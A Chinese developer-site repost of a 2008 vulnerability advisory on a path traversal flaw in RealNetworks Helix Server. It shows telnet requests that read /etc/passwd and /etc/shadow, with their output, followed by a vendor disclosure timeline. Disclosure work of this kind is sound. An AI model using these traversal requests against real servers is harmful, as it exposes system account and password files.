AI 助理
备案控制台
开发者社区 安全 文章 正文

RealNetworks Helix Server URI Traversal Arbitrary File Access

2010-02-14 771
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: RealNetworks Helix Server URI Traversal Arbitrary File AccessVendor: RealNetworks (http://www. 
RealNetworks Helix Server URI Traversal Arbitrary File Access


Vendor: RealNetworks (http://www.realnetworks.com/)
Product: Helix Server (http://www.realnetworks.com/products/media_delivery.html)
Version: 9.0.6.1262

Exploit details:

$ telnet 1.2.3.4 80
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
OPTIONS / RTSP/1.0

RTSP/1.0 200 OK
CSeq: 0
Date: Sat, 15 Mar 2008 00:28:48 GMT
Server: Helix Server Version 9.0.6.1262 (linux-2.2-libc6-i586-server) (RealServer compatible)
Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN
RealChallenge1: c4x0ft2b97ec020481e88d9defa4f707
StatsMask: 3


Connection closed by foreign host.
$ telnet 1.2.3.4 80
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
GET //./././././../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
[..]
Connection closed by foreign host.
$ telnet 1.2.3.4 80
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
GET //./././././../../../../../etc/shadow
root:HashedPasswdOMG:13885:0:99999:7:::
bin:*:13187:0:99999:7:::
daemon:*:13187:0:99999:7:::
adm:*:13187:0:99999:7:::
lp:*:13187:0:99999:7:::
sync:*:13187:0:99999:7:::
[..]
Connection closed by foreign host.
$

Timeline:

Reported to vendor: 2008-06-16
Vendor ack: 2008-06-16
Vendor solution: Fixed with the release of v.11.x (Nov. 2005) and any v.12 in 2006-Q2


Afterthoughts:

This was discovered during a vulnerability assessment. The client was running outdated
software. The vulnerability was actually discovered by Nessus, one of the web server
related plugins fired, tried a traversal and found this.

Real's response and immediate reply (mail, and then phone call with extensive
discussion) was very well handled. Kudo's to them for taking security seriously.
文章标签:
Shell
安全
cnbird
目录
相关文章
2025「AI安全」全球攻防赛小编
|
6天前
|
人工智能 运维 安全
从“裸奔”到“金钟罩”:AI身份凭据安全的进化之路
构建身份权限安全,护航企业数据合规
2025「AI安全」全球攻防赛小编
1186 15
弹性计算-百晓生
|
4天前
|
人工智能 异构计算
敬请锁定《C位面对面》,洞察通用计算如何在AI时代持续赋能企业创新,助力业务发展!
敬请锁定《C位面对面》,洞察通用计算如何在AI时代持续赋能企业创新,助力业务发展!
弹性计算-百晓生
1009 11
modelscope
|
6天前
|
机器学习/深度学习 人工智能 自然语言处理
B站开源IndexTTS2,用极致表现力颠覆听觉体验
在语音合成技术不断演进的背景下,早期版本的IndexTTS虽然在多场景应用中展现出良好的表现,但在情感表达的细腻度与时长控制的精准性方面仍存在提升空间。为了解决这些问题,并进一步推动零样本语音合成在实际场景中的落地能力,B站语音团队对模型架构与训练策略进行了深度优化,推出了全新一代语音合成模型——IndexTTS2 。
modelscope
565 20
2025「AI安全」全球攻防赛小编
|
4天前
|
云安全 人工智能 安全
内含报名福利|云栖大会AI安全前沿攻防技术论坛报名开启!
论坛时间:9月26日上午
2025「AI安全」全球攻防赛小编
879 10
探索云世界
|
12天前
|
人工智能 JavaScript 测试技术
Qwen3-Coder入门教程|10分钟搞定安装配置
Qwen3-Coder 挑战赛简介:无论你是编程小白还是办公达人,都能通过本教程快速上手 Qwen-Code CLI,利用 AI 轻松实现代码编写、文档处理等任务。内容涵盖 API 配置、CLI 安装及多种实用案例,助你提升效率,体验智能编码的乐趣。
探索云世界
923 109
aliyun7937252284-32777
|
5天前
|
人工智能 测试技术 API
智能体(AI Agent)搭建全攻略:从概念到实践的终极指南
在人工智能浪潮中,智能体(AI Agent)正成为变革性技术。它们具备自主决策、环境感知、任务执行等能力,广泛应用于日常任务与商业流程。本文详解智能体概念、架构及七步搭建指南,助你打造专属智能体,迎接智能自动化新时代。
aliyun7937252284-32777
544 7